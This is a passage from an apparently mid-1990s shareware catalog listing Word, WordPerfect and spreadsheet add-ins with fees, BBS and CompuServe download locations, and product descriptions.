3.15.2 For PC-Write + + Product: Over_LAZ HP + HP LaserJet overlays and letterheads. See full description on + page 253. + + Chapter 3, "Writing applications" 256 + + + + Product: PC-Proof + A commercial quality grammar checker. See full description on + page 243. + + Product: WinProof + Windows grammar checker. See full description on page 245. + + 3.15.3 For Word + + Product: Over_LAZ HP + HP LaserJet overlays and letterheads. See full description on + page 253. + + Product: PC-Proof + A commercial quality grammar checker. See full description on + page 243. + + 3.15.3.1 Word for Windows + + Product: AMF'S WINFAX PRO 4.0 MACRO + Author: AMF Shareware Productions + Version: 1 (09-06-94) + Needs: IBM AT (80286), Windows 3.1 or better. Word for Windows + 6.0. + Registration fee: $10.00 + Registration benefits: Full program functionality; 6 months of + unlimited CompuServe, mail support; all ASP-wide offers (see + page 6). 1-month free upgrading allowed. + Look for: WFX40.ZIP on BBSs; WFX40.ZIP on CompuServe in + CIS:MSWORD forum LIBrary 4 (or contact userID 74250,1700 for + assistance). + SWREG#: 2618 + Download size: 65k (about five minutes with a 2400 baud modem) + Description: + The only fax macro in the business which takes advantage of + virtually every feature of WinFax Pro 4.0 from inside Word 6.0. + Choose cover pages, resolution, type on cover page, specify + recipient, do background faxing, and so much more. + + Chapter 3, "Writing applications" 257 + + + + Product: Business Cards for Word 6.0 + Author: AMF Shareware Productions + Version: 2.0 (05-02-95) + Needs: IBM AT (80286), Windows 3.1 or better. Word for Windows + 6.0. + Registration fee: $5.00 + Registration benefits: Full program functionality; printed + manual; 6 months of unlimited mail support; source code; bonus + data; all ASP-wide offers (see page 6). + Look for: AFCRD.ZIP on BBSs; AFCRD.ZIP on CompuServe in + CIS:MSWORD forum LIBrary 4 (or contact userID 74250,1700 for + assistance). + SWREG#: 2260 + Download size: 60k (about five minutes with a 2400 baud modem) + Description: + Quickly and effortlessly, one can create quality, professional- + looking, custom business cards with Word 6.0 + + + Product: CD Player for Word 6.0 + Author: AMF Shareware Productions + Version: 1 (05-02-95) + Needs: IBM AT (80286), Windows 3.1 or better. CD-ROM drive. + Word for Windows 6.0, CD-Audio Driver for Windows. + Registration fee: $15.00 + Registration benefits: Full program functionality; 6 months of + unlimited CompuServe, mail support; all ASP-wide offers (see + page 6). 1-month free upgrading allowed. + Look for: CD.ZIP on BBSs; CD.ZIP on CompuServe in CIS:MSWORD + forum LIBrary 4 (or contact userID 74250,1700 for assistance). + SWREG#: 2857 + Download size: 75k (about six minutes with a 2400 baud modem) + Description: + The only full-featured CD player for Word. All basic CD + functions including scan backward/forward, stop, pause, random + play, live time display. Plus title database and more. All from + inside Word 6.0. Includes a beautiful, full-color toolbar and a + setup program. + + Chapter 3, "Writing applications" 258 + + + + Product: Chicago-Like Windows Titlers + Author: AMF Shareware Productions + Version: 1 (05-02-95) + Needs: IBM AT (80286), Windows 3.1 or better. Word for Windows + 6.0. + Registration fee: $6.00 + Registration benefits: Full program functionality; 6 months of + unlimited CompuServe, mail support; all ASP-wide offers (see + page 6). 1-month free upgrading allowed. + Look for: TITLE.ZIP on BBSs; TITLE.ZIP on CompuServe in + CIS:MSWORD forum LIBrary 4 (or contact userID 74250,1700 for + assistance). + SWREG#: 2402 + Download size: 45k (about four minutes with a 2400 baud modem) + Description: + This handy utility set will change Word's titlebar caption to + the title of the document, not the FileName. This simulates how + Windows 4.0 (Chicago) will work. Easy to use. Toolbars and help + included. Break the 8-character DOS limitation. Have long + descriptive names - not cyptic DOS file names. + + + Product: Colored Toolbar Icons for Word + Author: AMF Shareware Productions + Version: 2.0 (05-02-95) + Needs: IBM AT (80286), Windows 3.1 or better. Word for Windows + 6.0. + Registration fee: $10.00 + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 6 months of + unlimited CompuServe, mail support; bonus graphics; all ASP- + wide offers (see page 6). + Look for: AFCOLICO.ZIP on BBSs; AFCOLI.ZIP on CompuServe in + CIS:MSWORD forum LIBrary 4 (or contact userID 74250,1700 for + assistance). + SWREG#: 2303 + Download size: 35k (about three minutes with a 2400 baud modem) + Description: + This is a sample of the entire collection of colored toolbar + icons that come with the registered version. Colored toolbar + icons for every possible task you can imagine. Jazz up the Word + Workplace. Liven up presentations in Word. + + Chapter 3, "Writing applications" 259 + + + + Product: Exit Master for Word 6.0 + Author: AMF Shareware Productions + Version: 1.0 (05-02-95) + Needs: IBM AT (80286), Windows 3.1 or better. Word for Windows + 6.0. + Registration fee: $6.00 + Registration benefits: Full program functionality; 6 months of + unlimited CompuServe, mail support; all ASP-wide offers (see + page 6). 1-month free upgrading allowed. + Look for: EXIT.ZIP on BBSs; EXIT.ZIP on CompuServe in CIS:MSWORD + forum LIBrary 4 (or contact userID 74250,1700 for assistance). + SWREG#: 2502 + Download size: 45k (about four minutes with a 2400 baud modem) + Description: + Now, from inside Word, you can exit to DOS, exit Windows, + restart Windows, reboot your computer, and Exit Word with just + one click! Easy to use and operate. For Word 6.0 only. + + + Product: File Manager Jr. + File manager for WinWord 6.0. See full description on + page 190. + + Product: French Dictionary for Word 6.0 + Author: AMF Shareware Productions + Version: 1.0 (05-02-95) + Needs: IBM AT (80286), Windows 3.1 or better. Word for Windows + 6.0. + Registration fee: $15.00 + Registration benefits: Full program functionality; 6 months of + unlimited CompuServe, mail support; all ASP-wide offers (see + page 6). 1-month free upgrading allowed. + Look for: FRENCH.ZIP on BBSs; FRENCH.ZIP on CompuServe in + CIS:MSWORD forum LIBrary 4 (or contact userID 74250,1700 for + assistance). + SWREG#: 2700 + Download size: 55k (about four minutes with a 2400 baud modem) + Description: + Now you can easily look up words in English OR French, and have + the translations pasted into your document with accents. Easy + to use. Requires no effort. Word 6.0 only. + + Chapter 3, "Writing applications" 260 + + + + Product: HELLLP! + Author: Guy Software + Version: 1.0c (11-20-93) + Needs: IBM PC, Windows 3.0 or better. + Registration fee: $30.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of CompuServe, mail support; all ASP- + wide offers (see page 6). 12-month free upgrading allowed. + Look for: HELLLP.ZIP on BBSs (call 604-736-3453 to download it at + no charge); HELLLP.EXE on CompuServe in CIS:MSWORD forum + LIBrary 4 (or contact userID 71750,1036 for assistance). + SWREG#: 1346 + Download size: 75k (about six minutes with a 2400 baud modem) + Description: + Designed for user friendliness. Automatically sets up top level + table of contents with Hypertext jumps to topics already in + place. Add additional jumps and popups by highlighting the + place you want to jump from and pointing to the place you want + to jump to. Use Windows Help to give Hypertext access to + corporate manuals, as well as programs, templates and macros - + your people already know it and it's free with Windows. + + + Product: MegaWord + Author: Merlot International, (+1)-314-965-5630 + Version: 6.01 (04-26-94) + Needs: IBM PC, Windows 3.0 or better. + Strongly recommended: Mouse. + Registration fee: $49.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, + CompuServe, mail support; 3-month return policy; source code; + all ASP-wide offers (see page 6); discounts on other products; + discounts on upgrades. 3-month free upgrading allowed. + Look for: MEGAWORD.ZIP on BBSs; MW601.ZIP on CompuServe in + CIS:MSWORD forum LIBrary 4 (or contact userID 100273,32 for + assistance). + SWREG#: 1130 + PsL#: 10970 + Download size: 440k (about 33 minutes with a 2400 baud modem) + Description: + An add-in template for Word for Windows v6.0. Offers more than + 30 applications for complete file, project and directory + management, printing, editing, formatting, viewing, instant + spell-checking, plus tools that insert calendars, numbers and + dates in any format and in more than 20 languages. + + Chapter 3, "Writing applications" 261 + + + + Product: P.I.M. for Word 6.0 for Windows + Author: AMF Shareware Productions + Version: 4.2b DB+ (05-02-95) + Needs: IBM AT (80286), Windows 3.1 or better. Word for Windows + 6.0. + Registration fee: $15.00 + Registration benefits: Full program functionality; 6 months of + unlimited CompuServe, mail support; all ASP-wide offers (see + page 6); discounts on upgrades. 1-month free upgrading allowed. + Look for: PIM.ZIP on BBSs; PIM.ZIP on CompuServe in CIS:MSWORD + forum LIBrary 4 (or contact userID 74250,1700 for assistance). + SWREG#: 2480 + Download size: 95k (about seven minutes with a 2400 baud modem) + Description: + The only full featured PIM for Word for Windows 6.0. Store up + to 10,800 entries. Works and looks like a real rolodex. + Autodial, fax, create envelopes and labels, create full-color + reports, create lusiness letters and more with just one click. + Easy to use push-button interface. Supports background + WinFaxing, voice mail telephones, & all modems. Full + documentation included along with an installation utility. + Imports every database and spreadsheet. Has an alarm. + + + Product: Pink Bunny + Author: Guy Software + Version: 1.0 (11-20-93) + Needs: IBM PC, Windows 3.0 or better. + Registration fee: $10.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); all + ASP-wide offers (see page 6). + Look for: PNKBNY.ZIP on BBSs (call 604-736-3453 to download it at + no charge); PNKBNY.EXE on CompuServe in CIS:MSWORD forum + LIBrary 4 (or contact userID 71750,1036 for assistance). + Download size: 8k (about one minute with a 2400 baud modem) + Description: + Takes as input the name of a macro and a filename pattern which + may include wildcards (*,?). Opens each file, runs the macro, + saves and closes the file. The save may be switched off. + Another switch can be set to stop the open if a non-Word file + matches the pattern. Of particular value in conversion + projects where there are often minor fixups which need to be + made by macro to a bunch of files. + + Chapter 3, "Writing applications" 262 + + + + Product: Toolbar 2X for Word 6.0 + Author: AMF Shareware Productions + Version: 2.0 (05-02-95) + Needs: IBM AT (80286), Windows 3.1 or better. Word for Windows + 6.0. + Registration fee: $15.00 + Registration benefits: Full program functionality; 6 months of + unlimited CompuServe, mail support; all ASP-wide offers (see + page 6). 1-month free upgrading allowed. + Look for: TB2X.ZIP on BBSs; TB2X.ZIP on CompuServe in CIS:MSWORD + forum LIBrary 4 (or contact userID 74250,1700 for assistance). + SWREG#: 2677 + Download size: 55k (about four minutes with a 2400 baud modem) + Description: + Eliminate the clutter form the Word 6.0 Desktop with Toolbar + 2x. Allows two toolbars to occupy the space of one. Now fully + customizable. Easy to use and setup. Leaves more room for text + rather than toolbars. A real productivity tool. + + + Product: Ultimate Faxer for Word 6.0 + Author: AMF Shareware Productions + Version: 1.0 (05-02-95) + Needs: IBM AT (80286), Windows 3.1 or better. Word for Windows + 6.0. + Registration fee: $5.00 + Registration benefits: Full program functionality; 6 months of + unlimited CompuServe, mail support; all ASP-wide offers (see + page 6). 1-month free upgrading allowed. + Look for: FAXAMF.ZIP on BBSs; FAXAMF.ZIP on CompuServe in + CIS:MSWORD forum LIBrary 4 (or contact userID 74250,1700 for + assistance). + SWREG#: 2204 + Download size: 45k (about four minutes with a 2400 baud modem) + Description: + Using any version of WinFax (even the Lite and Ultralite + versions), you can easily fax the current document from Word + for Windows 6.0. Easy to use and has a handy page range + feature. + + Chapter 3, "Writing applications" 263 + + + + Product: Wordware v3.0.12a for WinWord 6 + Author: AMF Shareware Productions + Version: 3.0.12a (05-02-95) + Needs: IBM AT (80286), Windows 3.1 or better. Word for Windows + 6.0. + Registration fee: $39.95 + Registration benefits: Full program functionality; 6 months of + unlimited CompuServe, mail support; all ASP-wide offers (see + page 6); discounts on upgrades. + Look for: WW3.ZIP on BBSs; WW3.ZIP on CompuServe in CIS:MSWORD + forum LIBrary 4 (or contact userID 74250,1700 for assistance). + SWREG#: 3297 + PsL#: 11521 + Download size: 325k (about 24 minutes with a 2400 baud modem) + Description: + Has the best 55+ macros and templates to get Word going. + Includes a full-fledged PIM, full-faetured CD-player, and + everything from copying files, to renaming files, to playing + tic tac toe. A total solution for Word 6.0. Even has a project + manager. Open/print all your files in the Project with one + click! Includes a 3.5" disk labeler, and a faxer macro and + template which access every feature of WinFax Pro 4.0. Easy to + use and operate. + + + 3.15.4 For WordStar + + Product: DDKEY + Powerful 7.5K TSR key redefinition utility. See full + description on page 71. + + Product: Over_LAZ HP + HP LaserJet overlays and letterheads. See full description on + page 253. + + 3.15.5 For WordPerfect + + Product: Bookbild/DOS Pamphlet Publisher + Author: Science Translations Software Services, 410-661-2224 + Version: 1.1 (02-01-95) + Needs: IBM PC, DOS 3.0 or better. 640k RAM. WordPerfect 5.1 or + 5.1+/DOS. + Strongly recommended: Hard disk. + Registration fee: $20.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $2.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 12 months of unlimited + phone, fax, BBS, CompuServe, GEnie, newsletter, mail support; + 3-month return policy; bonus utilities; bonus graphics; all + ASP-wide offers (see page 6); discounts on other products. + Look for: BKBILD11.ZIP on BBSs (call 410-285-4032 to download it + at no charge); BKBILD.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 12 (or contact userID 72144,1241 for assistance); + + Chapter 3, "Writing applications" 264 + + + + BKBILD11.ZIP on GEnie in WP forum LIBrary 6 (or contact userID + JERRY.STERN for assistance). + Download size: 137k (about ten minutes with a 2400 baud modem) + Description: + A macro package for WordPerfect 5.1 & 5.1+. The macro builds + pamphlets from formatted text files. The new document is + camera-ready, with each page in the correct sequence for + printing. Any two-across format can be used, in either + portrait or landscape mode. (Requires landscape fonts in + printer or add-on font package for landscape booklets.) Both + horizontally and vertically-folded booklets can be created. + + + Product: Bookbild/Win Pamphlet Publisher + Author: Science Translations Software Services, 410-661-2224 + Version: 1.1 (02-01-95) + Needs: IBM 80386, Windows 3.0 or better. 4000k RAM. WordPerfect + 5.2 or 5.2+/Windows. + Registration fee: $20.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $2.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 12 months of unlimited + phone, fax, BBS, CompuServe, GEnie, newsletter, mail support; + 3-month limited return policy; bonus graphics; all ASP-wide + offers (see page 6); discounts on other products. + Look for: BOOKWN11.ZIP on BBSs (call 410-285-4032 to download it + at no charge); BOOKWN.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 10 (or contact userID 72144,1241 for assistance); + BOOKWN11.ZIP on GEnie in WP forum LIBrary 8 (or contact userID + JERRY.STERN for assistance). + Download size: 80k (about six minutes with a 2400 baud modem) + Description: + Builds pamphlets for formatted documents in WordPerfect 5.2. + Any two-across format can be used, in either portrait or + landscape mode. Pages are rearranged into the order needed to + create camera-ready copy for bulk printing. Full instructions + make booklet preparation easy. + + + Product: dPerfect Merge + Converts xBase to WordPerfect secondary file. See full + description on page 60. + + Chapter 3, "Writing applications" 265 + + + + Product: Graphcat/DOS Clip Art Cataloger + Author: Science Translations Software Services, 410-661-2224 + Version: 3.1 (06-20-94) + Needs: IBM PC, DOS 3.0 or better. 640k RAM; Hard disk. + WordPerfect 6.0 or 5.1 DOS editions, 6/90 release or newer. + Registration fee: $20.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $2.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 12 months of phone, + fax, BBS, CompuServe, GEnie, newsletter, mail support; 3-month + return policy; bonus graphics; all ASP-wide offers (see + page 6); discounts on other products; discounts on upgrades. + Look for: GCATWP31.ZIP on BBSs (call 410-285-4032 to download it + at no charge); GCATWP.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 10 (or contact userID 72144,1241 for assistance); + GCATWP31.ZIP on GEnie in WP forum LIBrary 6 (or contact userID + J.STERN10 for assistance). + Download size: 114k (about nine minutes with a 2400 baud modem) + Description: + DOS macro package that creates clip art catalogs in WordPerfect + 6.0, 5.1+, and 5.1. Prepares a catalog for printing with all + the graphics it can find in the directory or on the disk + chosen. Any graphic format supported by WordPerfect is also + supported. Support for WordPerfect 6.0. New in version 3.1: + Adds CD-ROM support, directory searching, partial catalogs, and + caption autosizing. Default settings can now be customized in + the registered edition, which also includes a megabyte of clip + art samples. + + + Product: Graphcat/Win Clip Art Cataloger + Author: Science Translations Software Services, 410-661-2224 + Version: 3.2 (02-01-95) + Needs: IBM 80386, Windows 3.0 or better. 4000k RAM. + WordPerfect/Windows version 6.1, 6.0 & 5.2, 5.2+. + Registration fee: $20.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $2.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 12 months of unlimited + phone, fax, BBS, CompuServe, GEnie, newsletter, mail support; + 3-month limited return policy; bonus graphics; all ASP-wide + offers (see page 6); disks of other shareware; discounts on + other products; discounts on upgrades. + Look for: GCATWN32.ZIP on BBSs (call 410-285-4032 to download it + at no charge); GCATWN.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 10 (or contact userID 72144,1241 for assistance); + GCATWN32.ZIP on GEnie in WP forum LIBrary 8 (or contact userID + JERRY.STERN for assistance). + Download size: 130k (about ten minutes with a 2400 baud modem) + Description: + A macro package for WordPerfect 6.1, 6.0, 6.0a, 5.2 & 5.2+ / + Windows that creates pictorial catalogs of clip art. All + graphics formats readable by WP/Win can be read by Graphcat, + and set up in columns as a pictorial catalog. Also can create + + Chapter 3, "Writing applications" 266 + + + + mergable listings of file names, and includes a database + template to aid in creating a full database of clip art files. + Supports directory searches, CD-ROM support, partial catalog + building, caption autosizing. + + + Product: The Letterhead Kit/DOS + Author: Science Translations Software Services, 410-661-2224 + Version: 3.0 (06-28-93) + Needs: IBM PC, DOS 3.0 or better. 640k RAM. WordPerfect 6.0 or + 5.1 DOS editions. + Strongly recommended: Hard disk. + Registration fee: $20.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $2.00 for shipping outside U.S. or Canada) + Registration benefits: quick-reference card; 31/2" master disk(s); + 12 months of unlimited phone, fax, BBS, CompuServe, GEnie, + newsletter, mail support; 3-month limited return policy; bonus + utilities; bonus templates; all ASP-wide offers (see page 6); + discounts on other products. + Look for: LTRKIT30.ZIP on BBSs (call 410-285-4032 to download it + at no charge); LTRKIT.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 2 (or contact userID 72144,1241 for assistance); + LTRKIT30.ZIP on GEnie in WP forum LIBrary 6 (or contact userID + JERRY.STERN for assistance). + Download size: 161k (about twelve minutes with a 2400 baud modem) + Description: + A set of macros, forms, and graphics for WordPerfect 6.0 and + 5.1/DOS for retrieving letterheads, invoices, scanned + signatures, and up to 10 FAX cover sheets or other custom forms + (20 in registered edition). Support for WordPerfect 6.0/DOS, + more FAX forms available, easier installation and + customization, with personal form names on the FAX menu. + Supports two letterheads and two scanned signatures-business + and personal. + + + Product: The Letterhead Kit/Win + Author: Science Translations Software Services, 410-661-2224 + Version: 3.0 (02-25-95) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; VGA monitor; + Hard disk. WordPerfect 6.1 or 6.0, 6.0a/Windows. + Registration fee: $20.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $2.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; quick- + reference card; 31/2" master disk(s); 12 months of phone, fax, + BBS, CompuServe, GEnie, newsletter, mail support; 3-month + return policy; bonus utilities; bonus data; bonus templates; + all ASP-wide offers (see page 6); disks of other shareware; + discounts on other products; discounts on upgrades. + Look for: LTRWIN30.ZIP on BBSs (call 410-285-4032 to download it + at no charge); LTRWIN.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 2 (or contact userID 72144,1241 for assistance); + + Chapter 3, "Writing applications" 267 + + + + LTRWIN30.ZIP on GEnie in WP forum LIBrary 8 (or contact userID + JERRY.STERN for assistance). + Download size: 240k (about 18 minutes with a 2400 baud modem) + Description: + Business Correspondence Assistant for WordPerfect 6.1 & 6.0, + 6.0a/Windows. A set of macros, forms, graphics and sample files + that retrieve letterheads, fax cover sheets, invoices, scanned + signature, and 30 message graphics, including "Rush!" and + "Thank you for your payment!" Forms and letterheads are + customized on-the-fly with user's name and address information. + + + Product: Over_LAZ HP + HP LaserJet overlays and letterheads. See full description on + page 253. + + Product: PC-Proof + A commercial quality grammar checker. See full description on + page 243. + + Product: Public Address + Full featured address manager. See full description on + page 288. + + Product: Thelma ThistleBlossom + Checks grammar, style, spell, punc & more. See full + description on page 243. + + Product: Thelma's ClichePlus + Finds cliches, idioms, long sentences. See full description on + page 244. + + Product: Thelma's SpellPlus + Spell, capitalizes, proper nouns, full editor. See full + description on page 241. + + Product: WinProof + Windows grammar checker. See full description on page 245. + + 3.15.6 For other + + Product: Btr Help! + Btrieve File Utility. Repair, Edit, Browse. See full + description on page 498. + + Product: Examine + Fast text search utility for Windows. See full description on + page 18. + + Product: Over_LAZ PS + PostScript overlays and letterheads. See full description on + page 115. + + Chapter 3, "Writing applications" 268 + + + + Product: PSEARCH + Fast tool to search for files with text words. See full + description on page 22. + + Chapter 4, "Spreadsheet applications" 269 + + + + + + Chapter 4 + Spreadsheet applications + + See also: Utilities, Desktop utilities, Calculators; Finances, + Financial calculators; Business. + + + 4.1 Spreadsheet programs + + Product: ALITE + Author: TRIUS, Inc., 508-794-9377 + Version: 1.20r (07-08-93) + Needs: IBM PC, DOS 2.11 or better. 7k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor; Dual 720k floppy drives; + Epson printer. + Strongly recommended: EGA monitor; Hard disk; EMS memory; XMS + memory. + Registration fee: $20.00 (add $6.00 for shipping to U.S. + addresses) (add $8.50 for shipping to Canadian addresses) (add + $12.50 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of phone, + fax, BBS, CompuServe, newsletter, mail support; 1-month limited + return policy; discounts on other products. + Look for: ALITE.ZIP on BBSs (call 617-354-2505 to download it at + no charge); ALITE.ZIP on CompuServe in CIS:IBMAPP forum LIBrary + 6 (or contact userID 71333,103 for assistance). + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + Powerful spreadsheet that will run even on a system with only + 256k RAM! It will even run as TSR using 7k RAM; 2048 rows by + 128 columns; line, X-Y, bar, pie and stacked bar graphs; macro + command language, math, statistical, financial, date and string + functions; WKS and WK1 file compatible; data regression, data + question and data bin operations; file import, export and + merge, PIC file generation, and file linking; split windows, + block protection, matrix operations, and much more... + + Chapter 4, "Spreadsheet applications" 270 + + + + Product: AS-EASY-AS + Author: TRIUS, Inc., 508-794-9377 + Version: 5.50e (10-29-93) + Needs: IBM PC, DOS 3.2 or better. 382k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor; Dual 720k floppy drives; + HP LaserJet printer; Epson printer. + Strongly recommended: EGA monitor; Hard disk; Mouse; EMS + memory; math coprocessor. + Registration fee: $69.00 (add $6.00 for shipping to U.S. + addresses) (add $8.50 for shipping to Canadian addresses) (add + $12.50 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of phone, + fax, BBS, CompuServe, newsletter, mail support; 1-month limited + return policy; discounts on upgrades. + Look for: ASA550E.ZIP on BBSs (call 617-354-2505 to download it + at no charge); ASEASY.ZIP on CompuServe in CIS:IBMAPP forum + LIBrary 6 (or contact userID 71333,103 for assistance). + Download size: 330k (about 25 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Awards & nominations: 1992 winner, Shareware Industry Awards. + Description: + Powerful 8192 rows by 256 columns spreadsheet. EMS and virtual + memory support. Fully mouseable. Print preview mode with + headers, footers, etc. Math, statistical, financial, logical, + date/time, string and user defined functions. Text & graphics + on same page. 12 graph types, (log scales, split graphs). + 9-pin, 24-pin and LaserJet support. WKS and WK1 file + compatible. Powerful macro language. Goalseeking, dBASE file + export/import, file merge & file linking. Matrix operations, + and much more... + + Chapter 4, "Spreadsheet applications" 271 + + + + Product: AstroFormulaCalculator 3 + Author: PCSCC, Inc., 203-270-9079 + Version: 3.1 (08-01-93) + Needs: IBM PC, DOS 2.1 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $29.95 (add $5.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); 51/4" master disk(s); 3 months of phone, + CompuServe, newsletter, mail support; bonus utilities; all ASP- + wide offers (see page 6). + Look for: availability unknown on BBSs. + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + High level spreadsheet/calculator. Versatile function library. + Completely format-free. Much more powerful than a calculator + but easier than a spreadsheet! Advanced numerical operations + include Newton-Raphson for solving x in Y=f(x), advanced + simplex for solving x at W=Y=Z... in W=f(x), Y=g(x), Z=h(x)..., + numerical integration (two methods), differentiation, + summation, maxima/minima, plotting, screen dumps, DOS command + line math, comprehensive and interactive on-line help file, and + much more! + + + Product: EXPRESSCALC + Author: Expressware Corporation, 206-788-0932 + Version: 4.10 (05-02-92) + Needs: IBM PC, DOS 2.0 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: Hard disk. + Registration fee: $59.95 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $23.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, BBS, + CompuServe, mail support; 2-month return policy; discounts on + upgrades. 1-month free upgrading allowed. + Look for: ECALC*.ZIP on BBSs (multiple files) (call 206-788-4008 + to download it at no charge); ECALC4.ZIP on CompuServe in + CIS:IBMAPP forum LIBrary 6 (multiple files) (or contact userID + 75226,2020 for assistance). + Download size: 360k (about 27 minutes with a 2400 baud modem) + Description: + Matrix size defaults to 64 columns by 256 lines for a total of + 16,384 cells. Supports EGA and VGA monitors for more lines on + the screen. Math functions include standard deviation, net + present value, payment and more. Lookup function allows + linking to other spreadsheets. Cells can be hidden. Data can + + Chapter 4, "Spreadsheet applications" 272 + + + + be imported and exported between File Express and ExpressGraph. + Wide spreadsheets can be printed using On-Side. + + + Product: Sci & Eng Tool for Lotus 1-2-3 + Solver and programmable calculator for 1-2-3. See full + description on page 309. + + Product: Super Macro Library for 1-2-3 + A library of super power macros for 1-2-3. See full + description on page 275. + + Product: Total Investor for 1-2-3 Window [***] + Portfolio management and charting for 1-2-3. See full + description on page 274. + + + 4.2 Boilerplates/templates + + Product: INSTSPEC + Templates for instr data sheets (controls). See full + description on page 415. + + Product: Total Investor for 1-2-3 Window [***] + Author: Hughes Financial Services, 201-895-5665 + Version: 3.0 (08-17-95) + Needs: IBM 80386, DOS 3.0 or better. 4000k RAM. + Registration fee: $49.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $7.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 12 months of unlimited fax, BBS, + CompuServe, newsletter, mail support; bonus data; all ASP-wide + offers (see page 6). Lifetime free upgrading allowed. + Look for: availability unknown on BBSs; TI123.EXE on CompuServe + in CIS:LOTUSA forum LIBrary 0 (or contact userID 76057,2400 for + assistance). + SWREG#: 7060 + Download size: 400k (about 30 minutes with a 2400 baud modem) + Description: + An integrated portfolio management and technical analysis + package for use with Lotus 1-2-3 for Windows (v4 or better). It + tracks securities and transactions, calculates returns, charts + stocks, and helps make trading decisions based on a wide array + of technical indicators. Includes built in updating from + America Online, Prodigy, and Compuserve. Indicators include + HLCV charts, relative strength, moving averages, RSI and many + others. + + + 4.3 Spreadsheet utilities + + See also: Utilities, Printer utilities. + + Chapter 4, "Spreadsheet applications" 273 + + + + Product: ON-SIDE + Print any wide ASCII file sideways. See full description on + page 87. + + Product: Super Macro Library for 1-2-3 + Author: K.I.T.A.L. Software, 972-498-7255 + Version: 3.4 (06-01-93) + Needs: IBM PC, DOS 2.0 or better. 640k RAM. Lotus 1-2-3 2.0 or + better. + Registration fee: $50.00 + Registration benefits: lifetime unlimited phone, mail support; + discounts on other products. 24-month free upgrading allowed. + Look for: availability unknown on BBSs. + Download size: 800k (about 60 minutes with a 2400 baud modem) + Description: + Library contains over 250 *.wk1 macros plus over 220 *.mlb + macros that sense the Lotus release and transparently works on + all versions 2.0 & up, 2-D and 3-D (multiple sheets ranges!). + Ranges does not have to be contiguous or of one type of data. + Example, when macro processes labels, cells of other types are + ignored. Menu driven Macro Managers allow using point & shoot + to start macros without combining them. Only manager stays with + worksheet. Macros and managers outperform commercial library + macros! + + + 4.3.1 File format translators + + See also: Utilities, File utilities, File sorting & conversion. + + Product: DATA MASTER + Database management program. See full description on page 282. + + Product: Extract It + Report Data Extractor. See full description on page 60. + + + 4.4 Software tools & add-ins + + 4.4.1 For multiple programs + + Product: 4Print/4Book DOS + Paper saving utility for LaserJets & DeskJets. See full + description on page 106. + + Product: 4Print/4Book Windows + 4Print/4Book DOS + 4PrinW Windows interface. See full + description on page 106. + + Product: Bubble Chart + Bubble Chart, animated graph. See full description on + page 340. + + Chapter 4, "Spreadsheet applications" 274 + + + + Product: Simstat + Complete statistics and simulation program. See full + description on page 448. + + 4.4.2 For Lotus + + Product: Sci & Eng Tool for Lotus 1-2-3 + Solver and programmable calculator for 1-2-3. See full + description on page 309. + + Product: Super Macro Library for 1-2-3 + A library of super power macros for 1-2-3. See full + description on page 273. + + Product: Total Investor for 1-2-3 DOS [***] + Portfolio manager/technical analysis template. See full + description on page 389. + + Product: Total Investor for Symphony [***] + Portfolio manager/technical analysis template. See full + description on page 390. + + 4.4.3 For Excel + + Product: DDE Requester for Win3.x & NT + DDE history recorder to access1.1 MDB or text. See full + description on page 406. + + Chapter 5, "Database applications" 275 + + + + + + Chapter 5 + Database applications + + See also: Data; Computer programming, Database engines. + + + 5.1 Relational database managers + + Product: THE CALLING TREE + Calling tree database manager. See full description on + page 364. + + Product: Car Restoration Diary + Author: RMH Computer Services, 317-782-9903 + Version: 2.31 